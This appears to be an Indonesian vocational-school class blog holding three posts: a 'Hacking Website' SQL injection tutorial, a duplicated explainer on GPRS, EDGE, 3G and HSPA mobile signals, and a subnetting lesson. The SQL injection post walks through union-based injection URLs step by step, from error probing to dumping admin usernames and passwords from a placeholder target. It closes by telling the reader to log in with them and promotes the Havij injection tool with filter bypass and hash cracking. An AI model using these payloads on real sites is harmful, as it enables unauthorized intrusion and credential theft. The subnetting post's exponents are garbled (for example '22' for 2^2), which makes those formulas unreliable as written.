X TKJ 1 SMK N 1 PURWODADI

Selamat Belajar di blog omnambos, selamat berkreativitas. salam satu jiwa. "=Cyber4rt Crew=" selamat menambah pengetahuan baru dan semoga bermanfaat

Hacking Website

Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.
Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah

http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC
oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Catatan: Cara otomatis dengan memakai software bisa juga dilakukan, selengkapnya lihat artikel berikut ini
Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
  1. Supported Databases with injection methods:
    • MsSQL 2000/2005 with error
    • MsSQL 2000/2005 no error (union based)
    • MySQL (union based)
    • MySQL Blind
    • MySQL error based
    • Oracle (union based)
    • MsAccess (union based)
  2. Automatic database detection
  3. Automatic type detection (string or integer)
  4. Automatic keyword detection (finding difference between the positive and negative response)
  5. Trying different injection syntaxes
  6. Proxy support
  7. Real time result
  8. Options for replacing space by /**/,+,… against IDS or filters
  9. Avoid using strings (magic_quotes similar filters bypass)
  10. Bypassing illegal union
  11. Full customizable http headers (like referer and user agent)
  12. Load cookie from site for authentication
  13. Guessing tables and columns in mysql<5 also="" and="" blind="" in="" li="" msaccess="">
  14. Fast getting tables and columns for mysql
  15. Multi thread Admin page finder
  16. Multi thread Online MD5 cracker
  17. Getting DBMS Informations
  18. Getting tables, columns and data
  19. Command executation (mssql only)
  20. Reading system files (mysql only)
  21. Insert/update/delete data
Download HAVIJ 0 komentar

PERBEDAAN SINYAL GPRS, EDGE, 3G, HSUPA, HSDPA dan HSPA



Saat ini perkembangan Industri telekomunikasi makin Pesat saja bangkan sudah merupakan kebutuhan pokok di semua bidang seperti pendidikan, industri, pemerintahan dll,dengan semakin meningkatnya para pengguna jasa telekomunikasi para pengembang pun mulai memikirkan bagaimana cara untuk meningkatkan pelayanan komunikasi.....itu mah sekilas info ja he...he..he..nah ane mau sharing nie tentang perbedaan teknologi sinyal Operator GSM ternyata sampai sekarang terus berkembang....ok langsung nie perbedaan nya antaralain :




1. GPRS

(General Packet Radio Service) : GPRS sering disebut dengan teknologi 2G. Fasilitas yang diberikan oleh GPRS : e-mail, mms (pesan gambar), browsing internet... kecepatan akses antara 56kbps sampai 115kbps. Yang ini yang paling slow

2. EDGE

(Enhanced Data for Global Evolution)/2.5G : Fasilitas yang disediakan EDGE sama seperti GPRS (e-mail, mms, dan browsing). Kecepatan aksesnya kurang lebih sekitar 384kbps (3x kecepatan GPRS). Ini mayan lah lebih cepet dari GPRS

3. 3G/UMTS

(Universal Mobile Telecommunication Service) : Selain menyediakan fasilitas akses internet (e-mail, mms, dan browsing), UMTS juga menyediakan fasilitas video streaming, video conference, dan video calling... 480kbps

4. HSUPA

(High Speed Uplink Packet Access), yaitu kemampuan mengupload data dari komputer/laptop user ke internet. Contoh: kecepatan UPLOAD foto ke facebook, blog dan sebagainya.

5. HSDPA

(High Speed Downlink Packet Access) / 3.5 G : pengembangan data dari UMTS/3G... seharusnya speednya lebih kenceng dari 3G

6. HSPA

(High Speed Packet Access) merupakan induknya dari HSDPA dan HSUPA. HSPA merupakan hasil pengembangan teknologi 3G gelombang pertama, Release 99 (R99). Sehingga HSPA mampu bekerja jauh lebih cepat bila dibandingkan dengan koneksi R99. Terkait jaringan CDMA, HSPA dapat disejajarkan dengan Evolution Data Optimized (EV-DO) yang merupakan perkembangan dari CDMA2000




nah itu perbedaan nya sinyal-sinyal yg mendukung operator yang ada di indonesia....di atas ane juga menyinggung sinyal untuk EV-DO cdma ntar ane share lg untuk Operator CDMA yg mendukung Jaringan EVDO...sampai saat ini untuk bisa dapet Sinyal HSPA udah banyak operator GSM yg ngedukung bisa dapet sinyal HSPA tapi tetep ini sesuai dengan tempat anda berada,terus kepadatan pengguna bisa mempengaruhi sinyal juga karna klo terlalu penuh bisa2 overload dan satu lagi faktor dari operator itu sendiri bisa gangguan ato ada perbaikan sistem.




ok semoga bermanfaat :) 0 komentar

PERBEDAAN SINYAL GPRS, EDGE, 3G, HSUPA, HSDPA dan HSPA


Saat ini perkembangan Industri telekomunikasi makin Pesat saja bangkan sudah merupakan kebutuhan pokok di semua bidang seperti pendidikan, industri, pemerintahan dll,dengan semakin meningkatnya para pengguna jasa telekomunikasi para pengembang pun mulai memikirkan bagaimana cara untuk meningkatkan pelayanan komunikasi.....itu mah sekilas info ja he...he..he..nah ane mau sharing nie tentang perbedaan teknologi sinyal Operator GSM ternyata sampai sekarang terus berkembang....ok langsung nie perbedaan nya antaralain :

1. GPRS 
(General Packet Radio Service) : GPRS sering disebut dengan teknologi 2G. Fasilitas yang diberikan oleh GPRS : e-mail, mms (pesan gambar), browsing internet... kecepatan akses antara 56kbps sampai 115kbps. Yang ini yang paling slow
2. EDGE
(Enhanced Data for Global Evolution)/2.5G : Fasilitas yang disediakan EDGE sama seperti GPRS (e-mail, mms, dan browsing). Kecepatan aksesnya kurang lebih sekitar 384kbps (3x kecepatan GPRS). Ini mayan lah lebih cepet dari GPRS
3. 3G/UMTS
(Universal Mobile Telecommunication Service) : Selain menyediakan fasilitas akses internet (e-mail, mms, dan browsing), UMTS juga menyediakan fasilitas video streaming, video conference, dan video calling... 480kbps
4. HSUPA
(High Speed Uplink Packet Access), yaitu kemampuan mengupload data dari komputer/laptop user ke internet. Contoh: kecepatan UPLOAD foto ke facebook, blog dan sebagainya.
5. HSDPA
(High Speed Downlink Packet Access) / 3.5 G : pengembangan data dari UMTS/3G... seharusnya speednya lebih kenceng dari 3G
6. HSPA 
(High Speed Packet Access) merupakan induknya dari HSDPA dan HSUPA. HSPA merupakan hasil pengembangan teknologi 3G gelombang pertama, Release 99 (R99). Sehingga HSPA mampu bekerja jauh lebih cepat bila dibandingkan dengan koneksi R99. Terkait jaringan CDMA, HSPA dapat disejajarkan dengan Evolution Data Optimized (EV-DO) yang merupakan perkembangan dari CDMA2000

nah itu perbedaan nya sinyal-sinyal yg mendukung operator yang ada di indonesia....di atas ane juga menyinggung sinyal untuk EV-DO cdma ntar ane share lg untuk Operator CDMA yg mendukung Jaringan EVDO...sampai saat ini untuk bisa dapet Sinyal HSPA udah banyak operator GSM yg ngedukung bisa dapet sinyal HSPA tapi tetep ini sesuai dengan tempat anda berada,terus kepadatan pengguna bisa mempengaruhi sinyal juga karna klo terlalu penuh bisa2 overload dan satu lagi faktor dari operator itu sendiri bisa gangguan ato ada perbaikan sistem.

ok semoga bermanfaat :)
0 komentar

Belajar Subnetting

Setelah anda membaca artikel Konsep Subnetting, Siapa Takut? dan memahami konsep Subnetting dengan baik. Kali ini saatnya anda mempelajari teknik penghitungan subnetting. Penghitungan subnetting bisa dilakukan dengan dua cara, cara binary yang relatif lambat dan cara khusus yang lebih cepat. Pada hakekatnya semua pertanyaan tentang subnetting akan berkisar di empat masalah:Jumlah Subnet, Jumlah Host per Subnet, Blok Subnet, dan Alamat Host- Broadcast.

Penulisan IP address umumnya adalah dengan 192.168.1.2. Namun adakalanya ditulis dengan 192.168.1.2/24, apa ini artinya? Artinya bahwa IP address 192.168.1.2 dengan subnet mask 255.255.255.0. Lho kok bisa seperti itu? Ya, /24 diambil dari penghitungan bahwa 24 bit subnet mask diselubung dengan binari 1. Atau dengan kata lain, subnet masknya adalah: 11111111.11111111.11111111.00000000 (255.255.255.0). Konsep ini yang disebut dengan CIDR (Classless Inter-Domain Routing) yang diperkenalkan pertama kali tahun 1992 oleh IEFT.

Pertanyaan berikutnya adalah Subnet Mask berapa saja yang bisa digunakan untuk melakukan subnetting? Ini terjawab dengan tabel di bawah:

SUBNET MASKNILAI CIDR
255.128.0.0/9
255.192.0.0/10
255.224.0.0/11
255.240.0.0/12
255.248.0.0/13
255.252.0.0/14
255.254.0.0/15
255.255.0.0/16
255.255.128.0/17
255.255.192.0/18
255.255.224.0/19
SUBNET MASKNILAI CIDR
255.255.240.0/20
255.255.248.0/21
255.255.252.0/22
255.255.254.0/23
255.255.255.0/24
255.255.255.128/25
255.255.255.192/26
255.255.255.224/27
255.255.255.240/28
255.255.255.248/29
255.255.255.252/30


SUBNETTING PADA IP ADDRESS CLASS C

Ok, sekarang mari langsung latihan saja. Subnetting seperti apa yang terjadi dengan sebuah NETWORK ADDRESS 192.168.1.0/26 ?

Analisa: 192.168.1.0 berarti kelas C dengan Subnet Mask /26 berarti 11111111.11111111.11111111.11000000 (255.255.255.192).

Penghitungan: Seperti sudah saya sebutkan sebelumnya semua pertanyaan tentang subnetting akan berpusat di 4 hal, jumlah subnet, jumlah host per subnet, blok subnet, alamat host dan broadcast yang valid. Jadi kita selesaikan dengan urutan seperti itu:
Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada oktet terakhir subnet mask (2 oktet terakhir untuk kelas B, dan 3 oktet terakhir untuk kelas A). Jadi Jumlah Subnet adalah 22 = 4 subnet
Jumlah Host per Subnet = 2y – 2, dimana y adalah adalah kebalikan dari x yaitu banyaknya binari 0 pada oktet terakhir subnet. Jadi jumlah host per subnet adalah 26 – 2 = 62 host
Blok Subnet = 256 – 192 (nilai oktet terakhir subnet mask) = 64. Subnet berikutnya adalah 64 + 64 = 128, dan 128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128, 192.
Bagaimana dengan alamat host dan broadcast yang valid? Kita langsung buat tabelnya. Sebagai catatan, host pertama adalah 1 angka setelah subnet, dan broadcast adalah 1 angka sebelum subnet berikutnya.
    Subnet
    192.168.1.0
    192.168.1.64
    192.168.1.128
    192.168.1.192
    Host Pertama
    192.168.1.1
    192.168.1.65
    192.168.1.129
    192.168.1.193
    Host Terakhir
    192.168.1.62
    192.168.1.126
    192.168.1.190
    192.168.1.254
    Broadcast
    192.168.1.63
    192.168.1.127
    192.168.1.191
    192.168.1.255
Kita sudah selesaikan subnetting untuk IP address Class C. Dan kita bisa melanjutkan lagi untuk subnet mask yang lain, dengan konsep dan teknik yang sama. Subnet mask yang bisa digunakan untuk subnetting class C adalah seperti di bawah. Silakan anda coba menghitung seperti cara diatas untuk subnetmask lainnya.
Subnet MaskNilai CIDR
255.255.255.128/25
255.255.255.192/26
255.255.255.224/27
255.255.255.240/28
255.255.255.248/29
255.255.255.252/30


SUBNETTING PADA IP ADDRESS CLASS B

Berikutnya kita akan mencoba melakukan subnetting untuk IP address class B. Pertama, subnet mask yang bisa digunakan untuk subnetting class B adalah seperti dibawah. Sengaja saya pisahkan jadi dua, blok sebelah kiri dan kanan karena masing-masing berbeda teknik terutama untuk oktet yang “dimainkan” berdasarkan blok subnetnya. CIDR /17 sampai /24 caranya sama persis dengan subnetting Class C, hanya blok subnetnya kita masukkan langsung ke oktet ketiga, bukan seperti Class C yang “dimainkan” di oktet keempat. Sedangkan CIDR /25 sampai /30 (kelipatan) blok subnet kita “mainkan” di oktet keempat, tapi setelah selesai oktet ketiga berjalan maju (coeunter) dari 0, 1, 2, 3, dst.
SUBNET MASKNILAI CIDR
255.255.128.0/17
255.255.192.0/18
255.255.224.0/19
255.255.240.0/20
255.255.248.0/21
255.255.252.0/22
255.255.254.0/23
255.255.255.0/24
SUBNET MASKNILAI CIDR
255.255.255.128/25
255.255.255.192/26
255.255.255.224/27
255.255.255.240/28
255.255.255.248/29
255.255.255.252/30


Ok, kita coba dua soal untuk kedua teknik subnetting untuk Class B. Kita mulai dari yang menggunakan subnetmask dengan CIDR /17 sampai /24. Contoh network address 172.16.0.0/18.

Analisa: 172.16.0.0 berarti kelas B, dengan Subnet Mask /18 berarti 11111111.11111111.11000000.00000000 (255.255.192.0).

Penghitungan:
Jumlah Subnet = 2x, dimana x adalah banyaknya binari 1 pada 2 oktet terakhir. Jadi Jumlah Subnet adalah 22 = 4 subnet
Jumlah Host per Subnet = 2y – 2, dimana y adalah adalah kebalikan dari x yaitu banyaknya binari 0 pada 2 oktet terakhir. Jadi jumlah host per subnet adalah 214 – 2 = 16.382 host
Blok Subnet = 256 – 192 = 64. Subnet berikutnya adalah 64 + 64 = 128, dan 128+64=192. Jadi subnet lengkapnya adalah 0, 64, 128, 192.
Alamat host dan broadcast yang valid?
    Subnet
    172.16.0.0
    172.16.64.0
    172.16.128.0
    172.16.192.0
    Host Pertama
    172.16.0.1
    172.16.64.1
    172.16.128.1
    172.16.192.1
    Host Terakhir
    172.16.63.254
    172.16.127.254
    172.16.191.254
    172.16.255.254
    Broadcast
    172.16.63.255
    172.16.127.255
    172.16.191.255
    172.16..255.255


Berikutnya kita coba satu lagi untuk Class B khususnya untuk yang menggunakan subnetmask CIDR /25 sampai /30. Contoh network address 172.16.0.0/25.

Analisa: 172.16.0.0 berarti kelas B, dengan Subnet Mask /25 berarti 11111111.11111111.11111111.10000000 (255.255.255.128).

Penghitungan:
Jumlah Subnet = 29 = 512 subnet
Jumlah Host per Subnet = 27 – 2 = 126 host
Blok Subnet = 256 – 128 = 128. Jadi lengkapnya adalah (0, 128)
Alamat host dan broadcast yang valid?
Subnet172.16.0.0172.16.0.128172.16.1.0172.16.255.128
Host Pertama172.16.0.1172.16.0.129172.16.1.1172.16.255.129
Host Terakhir172.16.0.126172.16.0.254172.16.1.126172.16.255.254
Broadcast172.16.0.127172.16.0.255172.16.1.127172.16.255.255


Masih bingung juga? Ok sebelum masuk ke Class A, coba ulangi lagi dari Class C, dan baca pelan-pelan

SUBNETTING PADA IP ADDRESS CLASS A

Kalau sudah mantab dan paham, kita lanjut ke Class A. Konsepnya semua sama saja. Perbedaannya adalah di OKTET mana kita mainkan blok subnet. Kalau Class C di oktet ke 4 (terakhir), kelas B di Oktet 3 dan 4 (2 oktet terakhir), kalau Class A di oktet 2, 3 dan 4 (3 oktet terakhir). Kemudian subnet mask yang bisa digunakan untuk subnetting class A adalah semua subnet mask dari CIDR /8 sampai /30.

Kita coba latihan untuk network address 10.0.0.0/16.

Analisa: 10.0.0.0 berarti kelas A, dengan Subnet Mask /16 berarti 11111111.11111111.00000000.00000000 (255.255.0.0).

Penghitungan:
Jumlah Subnet = 28 = 256 subnet
Jumlah Host per Subnet = 216 – 2 = 65534 host
Blok Subnet = 256 – 255 = 1. Jadi subnet lengkapnya: 0,1,2,3,4, etc.
Alamat host dan broadcast yang valid?
Subnet10.0.0.010.1.0.010.254.0.010.255.0.0
Host Pertama10.0.0.110.1.0.110.254.0.110.255.0.1
Host Terakhir10.0.255.25410.1.255.25410.254.255.25410.255.255.254
Broadcast10.0.255.25510.1.255.25510.254.255.25510.255.255.255


Mudah-mudahan sudah setelah anda membaca paragraf terakhir ini, anda sudah memahami penghitungan subnetting dengan baik. Kalaupun belum paham juga, anda ulangi terus artikel ini pelan-pelan dari atas. Untuk teknik hapalan subnetting yang lebih cepat, tunggu di artikel berikutnya

Catatan: Semua penghitungan subnet diatas berasumsikan bahwa IP Subnet-Zeroes (dan IP Subnet-Ones) dihitung secara default. Buku versi terbaru Todd Lamle dan juga CCNA setelah 2005 sudah mengakomodasi masalah IP Subnet-Zeroes (dan IP Subnet-Ones) ini. CCNA pre-2005 tidak memasukkannya secara default (meskipun di kenyataan kita bisa mengaktifkannya dengan command ip subnet-zeroes), sehingga mungkin dalam beberapa buku tentang CCNA serta soal-soal test CNAP, anda masih menemukan rumus penghitungan Jumlah Subnet = 2x – 2

Tahap berikutnya adalah silakan download dan kerjakan soal latihan subnetting. Jangan lupa mengikuti artikel tentang Teknik Mengerjakan Soal Subnetting untuk memperkuat pemahaman anda dan meningkatkan kemampuan dalam mengerjakan soal dalam waktu terbatas. 0 komentar